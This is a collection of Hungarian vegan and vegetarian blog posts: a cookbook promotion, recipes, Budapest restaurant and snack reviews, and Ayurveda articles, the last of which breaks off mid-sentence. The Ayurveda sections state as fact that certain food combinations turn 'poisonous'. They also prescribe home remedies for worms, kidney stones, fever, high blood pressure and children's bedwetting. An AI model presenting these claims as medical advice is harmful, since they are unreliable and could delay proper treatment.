a több száz zöldséget, gyümölcsöt, magot, gabonát, melyek főszereplői a MIT ESZIK A VILÁG? Ha nem eszik... c. könyvnek. A könyv nemzetközi recepteket tartalmaz, magyar ízlelőbimbóval ellátott szerzőtől, európai vásárlási lehetőségekkel. Az egészségtudatosság mellett az ételintoleranciákra is figyeltem a könyv készítése során, így minden receptnél fel van tüntetve, hogy milyen "mentes" az étel. MIT JELENT A CÍM? A ,,MIT ESZIK A VILÁG?, azért született meg, hogy nemzetközi tapasztalataim és tanulmányaim alapján megválaszoljam azokat a gyakran nekem szegezett kérdéseket, melyek valahogy így hangoznak. ,,És akkor mit eszel? ,,Mit eszel, ha nem eszel húst? ,,Mit eszel, ha nem eszel glutént? ,,Mit eszel, ha nem eszel laktózt? ,,Mit eszel, ha nem eszel tojást? ,,Mit eszel, ha nem eszel állati eredetű ételt? ,,Mi az, hogy nyers vegán étkezés? ,,Milyen süteményt eszel, ha nem eszel finomított kristálycukrot? ,,Hogyan tudod elkerülni ezeket az alapanyagokat? ,,Hogyan tudsz így jóllakni? Ebben a könyvben nem arra keresem a választ, hogy miért legyen valaki vegetáriánus vagy vegán, vagy miért kerüljük a glutént, a laktózt, a finomított kristálycukrot akkor is, ha nem vagyunk orvosilag diagnosztizáltételallergiások. Lehetőségeket, ötleteket mutatok meg nektek, melyek segítségével sokkal színesebben és változatosabban fogyaszthatjuk a természet adta táplálékokat, alapanyagokat a konyhánkban. Vegetáriánus és vegán ételek mindenkinek! A húsevők is szoktak desszerteket, kifőtt tésztákat, gabonákat fogyasztani és a reggeli sem feltétlenül tartalmaz húst. ;-) Nem volt célom kifejezetten gyerekeknek készült ételeket megmutatni, de az eddigi visszajelzések alapján a gyermekek is nagyon szeretik a könyvet. Az utazós élmények, a privát világjárós képek, egyfajta "mesekönyv" hangulatot is árasztanak, így a gyerekek izgatottan várják, hogy mi történik velünk utazásaink során. Számtalan kérdéssel bombázva eközben az anyukákat! :-) (Kedves anyukák, akik már boldog MIT ESZIK A VILÁG? könyv tulajdonosok, ők számoltak be nekem ezekről a nem várt reakciókról.) A KÖNYVRŐL SZÁMOKBAN... 170 db vegetáriánus, 165 db gluténmentes, 160 db laktózmentes, 155 db tojásmentes, 140 db vegán, 45 db nyers vegán recept. 200 féle alapanyag 500 db színes fotó 4 kontinens 25 ország TOP10 listák 6 db interjú 80 db konyhai tipp A könyv első könyvbemutatója Dublinban volt, mivel jelenleg Írországban töltöm hétköznapjaimat. Azóta is nagy siker az írországi magyarok körében ez az izgalmas és információban gazdag, csodaszép könyv. Keménykötés, nagy méret, 284 oldal, színes fotók, könnyedén elkészíthető receptek és tálalási technikák, valós útikalandok. Gyertek! Együk körbe együtt a Világot! ;-) HASZNOS INFORMÁCIÓK A VÁSÁRLÁSHOZ A könyv ára: 5.995 Ft (+ postaköltség) vagy 20 euró (+postaköltség). A fizetés banki átutalással történik. Személyes átvételi lehetőség jelenleg az alábbi városokban elérhető: - Dublin, Írország - Luzern, Svájc - Ajka, Magyarország - Győr, Magyarország - Mosonmagyaróvár, Magyarország - Sopron, Magyarország - Budapest, Magyarország - A lista folyamatosan bővül. Könyvesboltokban a könyv nem lesz elérhető! Online értékesítés keretein belül kerül forgalomba, az írországi Avocado Foodship Limited kiadón keresztül. A Világ bármely pontjára eljuttajuk a könyvet postai és csomagküldő szolgáltatások segítségével. Tudom milyen nehéz magyar nyelvű könyvhöz jutni külföldi országban. Én magam is külföldön élő magyar vagyok hosszú évek óta, mialatt több országban is éltem és utaztam már. Ha szeretnél könyvet rendelni vagy kérdéseidre szeretnél választ kapni, szeretetettel állok a rendelkezésedre ezen az email címen: info@miteszikavilag.hu LAPOZZ BELE A KÖNYVBE! Katt ide! Még naaaaagyon hosszan tudnék írni a könyvről, annak keletkezéséről, megszületésének körülményeiről, mélypontokról, csodákról, támogatást nyújtó barátokról, családról és közösségről. Órákat vagy akár napokat képes lennék beszélni a MIT ESZIK A VILÁG?-ról, de most már nem húzom tovább a szót. Ennyi elég volt így első körben. Lapozzatok bele a könyvbe a megadott linken és ha bármi kérdésetek van írjatok nekünk az info@miteszikavilag.hu email címre. A könyvhöz tartozú www.miteszikavilag.hu weboldal már készül és hamarosan még több kérdés és válasz kap majd helyet az új honlapon. Addig is gyertek és nézzétek meg, hogy mit eszik a világ a Facebook oldalunk segítségével. Hamarosan újra útra kelünk, és még több izgalmas kalandról tudunk majd beszámolni nektek. Én már nagyon várom! :-) Megjegyzés: A közeljövőben várható könyvbemutatók helyszínei: Alkmaar (Hollandia), Zurich (Svájc), Sopron, Győr, Ajka, Budapest, Debrecen, London. Pontos dátumokról és helyszínekről bővebben információt a Mit eszik a Világ? Facebook oldalon kaphattok.
Erdélyi káposztaleves vega módra
Édesanyám mindig azt mondta: nem az évszakhoz kell öltözni, hanem az időjáráshoz. Igen anyu, igazad van. :) Én se a hűtőben figyelő görögdinnyét kívánom ma, hanem egy jó, tartalmas levest. Júliusban levest? Hát, most mit csináljak, ha egyszer októberi az idő??? ;)
Hozzávalók 3-4 személyre:
[...] Bővebben!
Datolyás tejturmix
2016. július 12. Élj harmóniában
A tej sajnos ma nagyon vitatott élelmiszer és tervezek is írni egy cikket az ájurvéda szemszögéből e tejfogyasztás kérdéséről. A tehén tej valóban az egyik legfontosabb táplálék és a fiatalság, életerő és a tiszta tudathoz szinte nélkülözhetetlen az ájruvéda ősi tanítása szerint. A probléma azzal van, hogy mit nevezünk tejnek, hogyan kell elkészíteni és hogyan, milyen ételkombinációkban lehet csak fogyasztani ahhoz, hogy valóban ne ártson. Az első lépés, hogy nem homogenizált, nem ultra pasztörizált, friss, bio tehén tejet használj. Tejet csak magában vagy édesen, illetve gabonával fogyassz - pl. tejbegríz:). A tejet ne fogyaszd együtt, sós ételekkel, hússal, tojással, joghurttal, túróval, mert ha így teszel a tej méreggé válik a szervezetedben. A tej emésztését pedig a megfelelő fűszerekkel tudod elősegíteni. Ez a tejes ital kiváló napindító energiabomba és nagyon finom. Az édesség iránti vágyat is jól csillapítja. Hozzávalók 1 csésze tehén tej (nem homogenizált, nem ultrapasztőrizált) 5 datolya 5 mandula csipet kardamom csipet szerecsendio csipet vanília V egyszermentes (bio) alapanyagokat használj! A mandula héját távolítsd el forró víz segítségével. Tedd oda a tejet a tűzre és tedd bele a datolyát, mandulát és s fűszereket. Forrald fel és főzd kis lángon kb 5-10 percig. Majd ha elkészült, melegen turmixold össze és már fogyaszthatod is. Ha érzékenyebb a gyomrod, előző este a mandulát és a datolyát beáztathatod, és reggel a mandula héját eltávolíthatod.
Cukkinis lasagna kesudiókrémmel
"Jó kétvágyat kívánok, kukoricát kapálok! 2300 pénzérme lesz, jóuram" - mondta az imént a MODOROS futár. Neeem, valójában szó sincs róla, hogy igénybe vettem volna a telefonos ételrendelést, mint a konyhai analfabéták mentőmellényét. A bevezető mondat csak azután jutott eszembe, miután átfutottam néhány fogyással kapcsolatos gasztronómiai cikket. (Egyes perverzek harisnyával fojtogatják magukat a gardróbban, mások többször is megnézik az Éhezők viadalát, én ilyeneket olvasok.) Amúgy pár hetes balatoni tapasztalataim alapján az emberek még bikiniszezonban is semmibe veszik a hasonló irományokat, legalábbis a parton heverő bikinis lamantinok és fecskenadrágos cethalak száma erre engedett következtetni. Mindemellett túl nyilvánvaló gesztus lenne lázadó jelleggel valami gigászi kalóriabombával visszavágni, következzen hát egy olyan lasagna, mely nem tartalmaz tésztát. (Már ha jelen esetben ez lasagnának hívható, egyébként meg nem érdekel, ha nem.) A lényeg, hogy rétegelni kell, így szakaszonként pofázom el a metódust visszautalva korábbi receptekre: Előkészíti fegyelmezetten: 2 közepes cukkini pár szelet vegán sajt (füstölt, ha kérhetném) A kesudiókrémhez: 1/2 fej vöröshagyma 4-5 szelet jalapeno 1 gerezd fokhagyma összetörve 15 dkg kesudió 1 csésze víz 2 ek száraz élesztő 1 ek kurkuma 1 ek fűszerpaprika (édes) 1 ek mustármag 1/2 tk őrölt szerecsendió 2 tk só bors A hagymát felaprítsuk, olívaolajon megpároljuk, hozzáadjuk a jalapenót, a fokhagymát és a kesudiót, és további 5-6 percig tutugjatjuk kis lángon. A serpenyőben lévő egész hóbelevancot turmixgépbe tesszük, hozzáadjuk a fűszereket, egy csésze vizet, és krémes állagúra turmixoljuk. A paradicsomos-darált szejtános elegyhez: 100 g szejtánpor 3 ek szójaszósz 1 dl langyos víz 1 fej vöröshagyma 2 gerezd fokhagyma 400 g aprított paradicsom (konzerv) 3 ek sűrített paradicsom 1 tk szárított petrezselyem 1 tk szárított oregánó 1 tk bazsalikom 2 db babérlevél Szejtánt hegesztünk az itt leírt módon. Ha elkészült, 2 centis kockákra nyiszatoljuk, majd egy aprítóban kíméletlenül ledaráljuk. 2 ek olívaolajon megpirítjuk, majd hagyjuk békében. Egy másik edényben nagy műgonddal megpároljuk a felkockázott hagymát, hozzáadjuk az összetört fokhagymát, a paradicsompürét, a vörösbort, majd a fűszereket, és pár perc után hanyagul beleborítjuk a darált szejtánt. Jó 4-5 percig főzzük, majd félretesszük. Ha mindkét komponenssel megvagyunk, jön a rettenetesen izgalmas rétegezés: egy hőálló tál alját vékonyan megkenjük a paradicsomos-szejtános löttyel, majd jön a hosszában 1cm-es szeletekre vágott cukkini egymás mellé halmozva. Ezt ravaszul megkenjük a kesudiókrémmel, majd következő rétegként ráhajítunk pár szelet vegán sajtot. Ugyanezt még egyszer eljátsszuk, a legfelső réteget a paradicsomszósz és a konokul ráhelyezett sajt képezi. A sütőben az egész hóbelevancot 190 fokon 50 percig sütjük, majd megzabáljuk.
Csodálatos, édes mennybéli felhő – barack smoothie egy csavarral
Turmixolj össze: – két érett banánt – 2 érett őszibarackot – egy marék friss bazsalikomlevelet – egy marék friss citromfűlevelet – és egy kevés vizet. Az eredmény a legcsodálatosabb ízkombináció egy egyszerű turmixban! The post Csodálatos, édes mennybéli felhő – barack smoothie egy csavarral appeared first on VegaNinja.
Új vegán éttermek Budapesten, amiket te is imádni fogsz!
Nem panaszkodhatnak a budapesti vegánok, sorra nyílnak az új helyek, ahol jobbnál jobb vegán ételekkel tömhetjük meg a hasunkat, és ha igazán különleges élményre vágyunk, azt is könnyen megkaphatjuk. Három új kedvencről fogok most írni, és egy negyedik, régebbi, ám kevésbé ismert játékosról. Cigköftem vegetáriánus török étterem 1. Cigköftem Teréz körút 20. (az Oktogonon) - vegetáriánus, vegán opcióval A Törökországból induló, de világszerte jelen lévő étteremlánc kínálatában egyetlen finomság áll a középpontban, de azt magas minőségben és őrülten jól harmonizáló ízekkel készítik. Bulgurt és paradicsompürét dolgoznak össze egy sűrű masszává, természetesen sok fűszerrel. Csípős, és kevésbé csípős verzió létezik, de a kevésbé csípős is túl csípős lehet azoknak, akik nincsenek hozzászokva. Apropó, tudtad, hogy a budapesti karácsonyi vásárban kapható csípős, édes, és csípmentes paprika? Hetekig ezen nevettünk, mikor megtaláltuk. Mint kiderült, ez egy létező, de feltehetőleg régies kifejezés. A cigköfte nevű masszát kérheted dürüm (lavas kenyérbe terkerve) és hamburger formájában. Én tekercsben kóstoltam, és rögtön rajongóvá váltam: a masszát belesimítják a lavas kenyérbe (ami olyasmi, mint a tortilla), jégsalátát, uborkát, paradicsomot, mentaleveleket, zellerleveleket tesznek mellé, és itt jön a trükk: gránátalmaszósszal és friss citrom levével locsolják meg az egészet. A cigköfte ízei olyan jól harmonizálnak a mentával és a gránátalmaszósszal, hogy rögtön meg akartam enni egy másodikat. Ami sajnos sikerült is volna, mert az adag elég kicsi, de végül a fagyi mellett döntöttünk. A hamburgeres verzióban ugyanezek az összetevők vannak, csak másképp néz ki, ám ez sem laktatóbb, mint a tekercses testvére, de cserébe 690-790 Ft-os árakkal számolhatunk. Kapható még icli köfte, ami párolt zöldségekkel töltött batyu, van gyümölcssaláta, és előfordul még vegán sütemény is. Kék Ló vegetáriánus étterem és fashion pub 2. Kék Ló Víg utca 28. (a Rákóczi téri piac mögött) - vegetáriánus, vegán opcióval A Kék Ló Fashion Pub régen a Kazinczy utcában volt, upcycled ruhaboltnak indult, majd - a ruha részleget megtartva – kávézóvá és bárrá alakult. Februárban költöztek a Víg utcába, itt már enni is lehet, nem is akármilyet: a napi menü, bár alapvetően egyszerű receptekről van szó, mégis különleges ízpárosításokkal dolgozik. Volt alkalmam beszélgetni tulajdonossal, aki iszonyú jófej, és nagyon hamar megtaláltuk a közös hangot. Mesélt vegánná válásáról, az újonnan felfedezett ízekről, a Ló előéletéről és a további elképzelésekről. Berlinben él, ahol van egy másik, teljesen vegán Kék Ló, melynek hatására a közelben lévő gyrosos és a pékség is elkezdett vegán ételeket árulni. Menüt ettünk, a leves egy répás, gyömbéres, krumplis, kókusztejszínes krémleves volt, a második fogás pedig basmati rizzsel és isteni paprikakrémmel tálalt zöldségragu. Ez után még legyűrtem egy csilis-csokis sütit, aminek a belsejében szaftos gyümölcsdarabok voltak elrejtve. A menü és a süti is naponta változik, ezen kívül helyben készült paninit is készítenek, természetesen vegán verzióban is, és áraik hasonlóan barátságosak, mint a hely maga. Az enteriőrről is érdemes szót ejteni, hiszen nagyon különleges és nagyon öko. Ahogyan a ruhák, a berendezés is upcycled, tehát meglévő tárgyak felhasználásával alkották meg, így is csökkentve az ökológiai lábnyomot. Az ezüstös falak között csupa meghökkentő furcsaság gazdagítja a vizuális élményt. Nehéz bármit kiemelni, inkább nézz be még ma! Mysore Pack vegán és nyers vegán étterem 3. Mysore Pack XI. Szabolcska Mihály utca 3. (az Allee-nál) – vegán és nyersvegán A korábbi VegaRáma helyett nyílt, különleges neve a mysore pak nevű édességre utal, ami az indiai Mysore városából ered. Az indiai tematika vizuálisan is megjelenik az étteremben, a falon indiai istenképek, a földön párnák, a hely hangulatát pedig belengi a spiritualitás, ennek megfelelően a kiszolgálás nagyon barátságos és lelkes. 5 után érkeztünk, páran már izgatottan készültek az esti kirtanra, ami egy zenés mantraéneklés. A tervek szerint minden kedden megrendezik majd. Az ételek ízletesek és szaftosak voltak. Nyers gyömbérlevest, töltött paprikát és ratatuille-t ettünk, amit lekísértünk egy csokis-ananászos palacsintával. Macska vegetáriánus étterem és pub +1. Macska Bérkocsis utca 23. (a Blahához közel) - vegetáriánus és vegán A Macska nem új hely, de a szívemhez és a lakhelyemhez is nagyon közel áll. Inkább pub, mint étterem, rengeteg különleges, kézműves sört tartanak, 2-3 féle magyar, kézműves sör pedig csapoltan is kapható. A kapható ételeknek kb. a fele vegán, a többi vegetáriánus. Bablevesben és mentás borsólevesben verhetetlenek, egy adaggal simán jól lehet lakni, de kóstoltam már náluk más fajta levest és dahlt is. A meleg, otthonos félhomályban mindig van mit nézni, a falakon időszaki kiállítások képei függnek, a párnákon ücsörgős galériára vezető lépcsőt pedig facicák díszítik. A kiszolgálás itt is kedves, szívesen járok vissza hozzájuk. Képek forrása: Facebook, Tripadvisor The post Új vegán éttermek Budapesten, amiket te is imádni fogsz! appeared first on VegaNinja.
Vegán mac n cheese
Most, hogy a legutóbbi recept betört a BBC GoodFood magazinba, már óhatatlanul magába szippantott a mislensznobizmus. Hazafelé menet három főzelékfalóra dobtam molotov-koktélt, egy kifőzdét ételhordóba rejtett pokolgéppel robbantottam fel, végül tehénjelmezben öngyilkosságot követtem el egy indiai gyorsbüfében. Persze a hírnév és az elismerés teherrel is jár, kb. egy hete verejtékezve riadok fel arra, hogy álmomban egy konyhásnéni Vegetát akar lapátolni a lebbencslevesembe. Na, de most jön egy igazi elitista, kulináris atomcsapás a sok gasztrobarbárra, történetesen a mac n cheese veganizált változata. (Ezt a fogást (mármint az eredeti változatot) mindössze egyszer készítették el Uganda diktátorának, aki a krokodilok közé dobatta a szakácsot, hogy titokban maradjon a recept.) Előkészíti: 250 g pennetészta 1/2 fej vöröshagyma 4-5 szelet jalapeno 1 gerezd fokhagyma összetörve 15 dkg kesudió 1 csésze víz 2 ek száraz élesztő 1 ek kurkuma 1 ek fűszerpaprika (édes) 1 ek mustármag 1/2 tk őrölt szerecsendió 2 tk só bors 4 ek zsemlemorzsa 1 tk petrezselyem felaprítva A tésztát - minden konyhai bravúrunkat bevetve - feltesszük főni. A hagymát felaprítsuk, olívaolajon megpároljuk, hozzáadjuk a jalapenót, a fokhagymát és a kesudiót, és további 5-6 percig tutugjatjuk kis lángon. A serpenyőben lévő egész hóbelevancot turmixgépbe tesszük, hozzáadjuk a fűszereket, egy csésze vizet, és krémes állagúra turmixoljuk. A zsemlemorzsát távolba révedő tekintettel összekeverjük a petrezselyemmel, kevés sót adunk hozzá. A megfőtt tésztát egy hőálló üvegtálba tesszük, összekeverjük a kesudiókrémmel, legfelső rétegként ráöntjük a zsemlemorzsát, majd 250 fokra előmelegített sütőben 15 percig sütjük. Viszont ez utóbbi manőver nélkül is jó étvággyal megzabálható.
Az őszibarack jótékony hatásai és ájurvédikus alkalmazása
2016. június 23. Élj harmóniában
Az őszibarack növény rokona egyéb csonthéjasoknak ( mandulának, kajszibaracknak és szilvának). A piacokon júniustól szeptember végéig megtalálhatjuk az őszibarack különböző méretű, fazonú, színű fajtáit. Ez a gyümölcs nagyon ízletes, lédús sokaknak nagy kedvence a nyári melegben. Frissen fogyasztva a legfinomabb és a legegészségesebb:) Vegyszermentes (bio) változatot egyél! Magas vitamin és ásványi anyag tartalma van (leginkább A és C-vitamin, kálium, magnézium) és magas az antioxidáns tartalma is. Magas a víztartalma is, így segít hidratálni a testet a nagy nyári melegben. Enyhén vízhajtó hatású, ezért tisztítja a veséket, hólyagot. Nem csak a víz-háztartásodra van hatással, de segít a vérnyomás szabályozásában is. Könnyen emészthető és tápláló. Erősíti a gyomrot, kiváló emésztési problémáknál. Nyugtatja az idegrendszert és természetes gyulladáscsökkentő Az ájurvédában nehéz vízes, édes, fanyar ízűnek minősül, melegítő energiával hat a testre. Növeli a Pitta-t és csökkenti, megnyugtatja a Vata-t. Ha több mint egy darabot eszel, akkor könnyen növeli a tüdőben a nyálkaképződést , ami növeli a kapha-t. A fűtő energiája miatt a barack, segít a vastagbélben található férgek elpusztításában. Néhány ájurvédikus alkalmazási mód: Férgek ellen, egyél egy vagy két barackot kora reggel üres gyomorra. Rá fél órára igyál egy csésze forró gyömbéritalt 2 teáskanál ricinusolajjal. Utána legalább 3 óráig ne egyél és ne igyál semmit. Ez a kúra segít elpusztítani a vastagbélben található különböző férgeket. Vese- vagy epekő esetén, igyál üres gyomorra egy csésze baracklevet összekeverve 1/2 tk. koriander porral. Ezt naponta kétszer fogyaszd. Epe vagy vesekő esetén ne egyél spenótot, paradicsomot, sót és tamarindot. Amennyiben magas lázad van, égető vizelettel - ezt a magas pitta okozza - igyál egy csésze baracklevelet összekeverve 1/2 tk római köményporral, 1 tk. kandiscukorporral. Székrekedés ellen, egyél 1 órával étkezés után 1 barackot. Ha olyan Vata tüneteid vannak: száraz nyelv, fáradtság, kimerült hang, szívdobogás, remegés olyankor igyál egy csésze baracklevelet egy csipet kősóval, 10 csepp limemal és 1 tk. kandiscukorral. ezt a keveréket naponta 3,4 alkalommal fogyaszthatod a tünetek megszüntetéséhez. Amennyiben izzadékony a kezed és a lábad , étkezéek után 1 órával egyél egy barackot. Magas vérnyomás esetén próbálj ki egy csésze baracklevelet, 1 tk. korianderporral, 1 csipet kardmomporral. ezt a keveréket 2,3 alkalommal fogyaszthatod naponta. Gyerekeknél ágybavizelés ellen, az ájurvéda javasolja, hogy egy csésze baracklevet keverjünk össze 1 csipet őrölt mákkal és naponta egyszer itassuk meg a gyerekkel néhány napon keresztül.
Snack Garden gyümölcsös és zöldséges vegán rágcsák
A Snack Garden gyümölcsös és zöldséges rágcsáit kóstoltam nem olyan régen, melynek eredményét a frissen indult Teszt szakasz rovatban dobom a közösbe.
A Teszt szakasz rovat kifejezetten vegán termékek fényezésével és lehúzásával foglalkozik majd. A termékek kapnak majd hideget meleget annak fényében, ahogy éppen szubjektív szemüvegem áll a fejemen. Első tesztalanyom a Snack Garden márkának két rágcsája, a trópusi gyümölcs mix, valamint a zöldségkeverék.
Snack Garden – liofilizált trópusi gyümölcs mix
Felnyitás után olyan elemi erővel ütött meg a gyümölcsök illata, hogy azt hittem a piacos pultnál állok és a frissen szedett eprek fölött görnyedek 20 cm-re. Az első pofon után jött a másik, amikor megkóstoltam. Ugyanis a liofilizálás ellenére olyan természetes és intenzív gyümölcsízt éreztem ,melyet sokszor a friss gyümölcsöknél sem lehet manapság. Mindezt úgy, hogy nincs semmilyen hozzáadott ízfokozó, cukor vagy kemikáliás vicceskedés. Ergó, tisztán a gyümölcsöt éreztem. Ez arra enged következtetni, hogy a gyártósorra piszok szigorú feltételek után kerülhet csak fel gyümölcs. Vagy valami eszméletlen jó trükköt alkalmaznak. Ha így van akkor kérjük a receptet! Mindemellett a gyümölcsök ropogóssága egyszerűen semmihez sem hasonlítható. Frissen nem ilyen, sülve nem ilyen. Egész romantikus érzés fogott el minden egyes falat után. Nem tudok mit hozzáfűzni. Zseniális a cucc. De tényleg.
Összetevők: banán (40%), eper (34%), ananász (26%), nitrogén csomagológáz
Kiszerelés: 32g (300g friss gyümölcsből)
Milyen mentes? Mindenmentes!
Snack Garden – vákuumban sütött, enyhén sózott zöldségkeverék
A gyümölcsmix után komoly elvárásokkal bontottam fel a sózott zöldségkeveréket, melynek illata nem volt olyan átütő, mint a gyümölcsöké. Sőt egy kicsit talán “sütödés” érzésem lett tőle. Az összetevőket és a készítést megnézve jöttem rá, hogy ez a különbség annak köszönhető, hogy míg a gyümölcsök liofilizáláson esnek át, addig a zöldségeket vákuumban sütik rizsolajban. Mindemellett hasonlóan dominált a zöldségek természetes íze és könnyen lehet, hogy ezt ettem volna először akkor nem érzek ekkora különbséget. A gyümölcsös túl magasra tette a lécet. Mindazonáltal bármikor szívesebben fogom enni bármilyen chips helyett, mivel egyértelműen egészségesebb és mindenmentessége számomra meggyőző.
Összetevők: vegyes zöldségek változó összetételben (burgonya, édesburgonya, sárgarépa, tök, zöldbab) 75,2%, rizsolaj, só, nitrogén csomagológáz
Kiszerelés: 40g (280g friss zöldségből)
Milyen mentes? Mindenmentes!
A Snack Garden kiemelkedően igényes csomagolása egyébként visszazárható, mely “fícsőr” első blikkre tök hasznosnak tűnik. Habár nem hinném, hogy sokáig megmarad egy ilyen mennyiségű nasi, ha felbontja valaki, de ha tényleg csak falatozol belőle akkor érdemes visszazárni, hogy ne szívja meg magát nedvességgel a tartalma és ne szottyosodjon meg. Feleségemmel nem csak magában ropogtattuk a gyümölcsöket, hanem rögtön a zabreggelihez is öntöttünk belőle. Úgy is nagyon fincsi volt. Ha a zabkásához megy, akkor pedig bizonyosan sok más édeskés étel kiegészítője is lehet. Áruk egyébként az átlag magyar pénztárcához mérten kicsit magas. A Herbaház webshopjában jelen pillanatban a gyümölcsös 760 forint, míg a zöldséges tasak ára 430 Ft. Egyelőre szinte piaci monopolistaként az ár elfogadható, meglátjuk, hogy milyen ártaktikával lépnek majd piacra a további szereplők.
Kapcsolódó linkek:
Snack Garden a weben
Snack Garden a facebookon
Javítsd az emészétsed - emésztést segítő és emésztést gyengítő ételkombinációk
2016. június 14. Élj harmóniában
Manapság a legtöbb embernek nem jó az emésztése. A hirdetésekben mással sem találkozni, mint emésztést segítő, puffadás gátló, hasfogó, hashajtó és reflux készítményekkel. Sokaknál a rossz emésztés bőrproblémát is okoz, gyengíti az immunrendszert végül valamilyen ételintoleranciába, allergiába csap át egy idő után. A megfelelő emésztést befolyásolja az elfogyasztott étel minősége, mennyisége, az étkezési tudatosság és a megfelelő időzítés. Az ájurvéda szerint, az egészség és az emésztés kulcsa a megfelelő emésztő tűz, azaz agni. Ez biztosítja, hogy egy ételt a szervezeted fel tudjon dolgozni és az étel energiával töltsön fel, táplálja a tested, beépüljenek a szükséges tápanyagok. Az étkezés fő célja, hogy a testedet energiával lásd el. Amikor étkezés után akár közvetlenül vagy két órával az étkezés után fáradtságot tapasztalsz, akkor nagy valószínűséggel nem energiát termelt az elfogyasztott étel a tested számára, hanem ellenkezőleg lecsökkentett azt. Egy étel minősége lehet a tested számára tápláló, energiát adó vagy az életenergiádat csökkentő és az emésztésed tüzét elapasztó. (részletesen erről itt olvashatsz) Az agnid ereje, természetesen egyéni alkatodtól függ, de vannak olyan ételkombinációk melyek az emésztő tüzedet lefojtják ezáltal emésztési és felszívódási problémákat okozhatnak. A rossz ételkombinációk erjedést, gázképződést, puffadást, rothadást, rossz emésztést okoznak és méreganyagokat ,,ama -t termelnek. Mostanában egyre több irányzat foglalkozik az ételek társításával, megfelelő, emésztést segítő kombinációkkal. Ezeket leginkább tapasztalati úton állítják össze - megfigyelt ék, bizonyos ételek együtt nehezebben emészthetőek. Az ájurvéda több ezer éves tudománya, minden egyes ételhez társít egyfajta hatást és részletesen leírja, hogy bizonyos hatások együttes kombinációja rontani fogja az agnit - azaz rossz emésztéshez és felszívódáshoz vezet. Sajnos a modern, rohanó világunkban nagyon sok példát látunk a helytelen ételkombinációkra. Ilyen pl. a tej és a banán. Mivel a tej az ájurvéda besorolásában édes minőségű, a banán savanyú ezek ellentétes minőségek egymással, ez a kombináció megváltoztatja a bélflórát, toxinok felhalmozódását okozza a szervezetedben, megfázást, köhögést, allergiát eredményezhet. A tej az egyik legkritikusabb, mert csak magában vagy édesen, gabonával javasolt fogyasztani pl. tejbegríz. A fent is említett tej és gyümölcs kombinációjából készült turmixok, sajnos az emésztésedben komoly problémákhoz vezetnek. A dinnye és tej kombináció, illetve tej és banán kombinációt tartja az ájurvéda a legmérgezőbbnek. Tejet nem javasolt élesztős gabonafélékkel fogyasztani. Pl a kalács és tej kombinációt érdemes elkerülni. Tejet ne kombinálj húsfélékkel, hallal, tojással,mert nem csak a gyomorban de a vérben is elváltozásokat okoz. A tej a joghurttal, sajttal vagy túróval sem javasolt kombináció. A sajtok és a túró nehezen emészthető, ha gyengébb az emésztésed próbáld őket elkerülni. Székrekedést és nehéz emésztést okozhatnak. A közkedvelt gyümölcs és joghurt kombináció sajnos szintén méreganyagok felhalmozódásához vezet a szervezetedben. A joghurtot gyümölcsökkel, sajttal, tojással, hallal, forró italokkal, hússal, tejjel és nadragulyafélékkel nem javasolt együtt enni. Gyümölcsöket csak magában fogyassz, ne keverd őket más ételekkel. A gyümölcs nagyon gyorsan emésztődik a gyomrodban, de ha pl. tejtermékekkel, vagy gabonákkal kevered erjedésnek indul és gyomorégést fog okozni. Néhány kivétel van az Ájurvédában ilyen pl. a datolya és tej keveréke, mert mindkettő hasonló minőségű és kifejezetten táplálják a testet. A citromot tejjel, paradicsommal, joghurttal és uborkával nem érdemes együtt kombinálni. Amennyiben babféléket együtt fogyasztod gyümölccsel, sajttal, tojással, joghurttal, hússal, hallal vagy tejjel szintén nagyon megnehezíti az emésztést. Ilyen pl a sólet tejtöllel kombinálva, ami nagyon nehéz emésztést okoz. A tojást is manapság mindenféle kombinációban fogyasztják. Az ájurvéda nem javasolja, babbal, sajttal, hallal, hússal, joghurttal és gyümölccsel együtt fogyasztani. Különösen tejjel nem ajánlott együtt fogyasztani. Manapság elterjedt pl. a rántottához tejet keverni vagy az elkészült tojásos ételhez tejet inni. Ilyen a palacsinta is, sokan tojást tesznek bele - nekem Édesanyám mindig azt mondta attól áll össze. Elárulom, ha összekevered a lisztet és a tejet, akkor is tökéletes palacsintát kapsz. Talán a tojástermelők terjeszthették el, hogy tojás nélkül nem lehet ételeket készíteni:) Bizonyos zöldségek, még ha ellentétes minőségűek is, amennyiben együtt főzzük őket és megfelelően fűszerezzük, akkor megfelelő ételkombinációt alkotnak az emésztés számára. A retekre kell különösen ügyelni, hogy ne fogyasszuk egyszerre tejjel, banánnal vagy mazsolával. A gabonákat nem javasolt gyümölcsökkel vagy tápiókával fogyasztani. A méz nagyon nagy kincs a szervezet számára, de figyelj rá, hogy soha ne hevítsd. Ne főzz, ne süss vele és ne rakd tűz forró teába, mert mérgezővé válik. A mézet nem ajánlott ghível egyenlő arányban keverni, mert ez is mérgező lesz a szervezeted számára, mivel a méz fűt, a ghí hűt. Amennyiben 2:1 arányban kevered az már teljesen megfelelő. A nadragulyaféléket (paradicsom, krumpli, padlizsán) amúgy sem mindenkinek ajánlott fogyasztani, de lehetőleg uborkával, dinnyével, tejtermékekkel ne fogyaszd együtt őket. Kerüld a hideg ételeket és italokat, mert ezek lefojtják az emésztés tüzét. Különösen figyelj, hogy az étkezésekhez ne fogyassz hideg folyadékot. Már többször írtam róla, hogy az állott ételek fogyasztása nagyon sok ,,amat méreganyagot halmoz fel a szervezetedben. Törekedj rá, hogy friss ételeket fogyassz. Amennyiben kénytelen vagy valami maradékot, állott ételt enni, kerüld el mindenképpen friss ételekkel történő kombinálását. Fogyasztás előtt melegítsd fel a maradék ételt és gyömbérrel, feketeborssal tudod segíteni a megemésztését. A forró italok fogyasztását az ájurvéda nem ajánlja kombinálni sajttal, hússal, joghurttal, hallal, keményítő tartalmú ételekkel és mangóval. Ájurvédikus összeférhetetlen ételkombinációk Amennyiben régóta alkalmazol egy helytelen kombinációt pl. alma sajttal, dinnye kenyérrel elképzelhető, hogy a tested már hozzászokott, de ha egy ismerősöd, aki sosem próbálta ki ezt az ételkombinációt, biztos, hogy kellemetlen tüneteket fog tapasztalni. Az egyik legfontosabb a megfelelő emésztőerő. Az emésztőerő javításához számos tippet egy korábbi cikkben itt olvashatsz. Akinek jó erős az agnija, az nagyon sokféle helytelen ételkombinációt is gond nélkül meg tud emészteni. Akinek viszont gyengébb az emésztőereje, célszerű figyelembe venni és elkerülni a nem megfelelő ételkombinációkat. Az ételkombinációk, ételek emésztését fűszerekkel, gyógynövényekkel tudod segíteni. A megfelelő fűszerkombinációk ételenként változóak, mert mindig az a cél, hogy az ételek hatását kiegyensúlyozottá tegyék. Az ételek hatását is nagyon jól lehet a gyógynövényekkel, 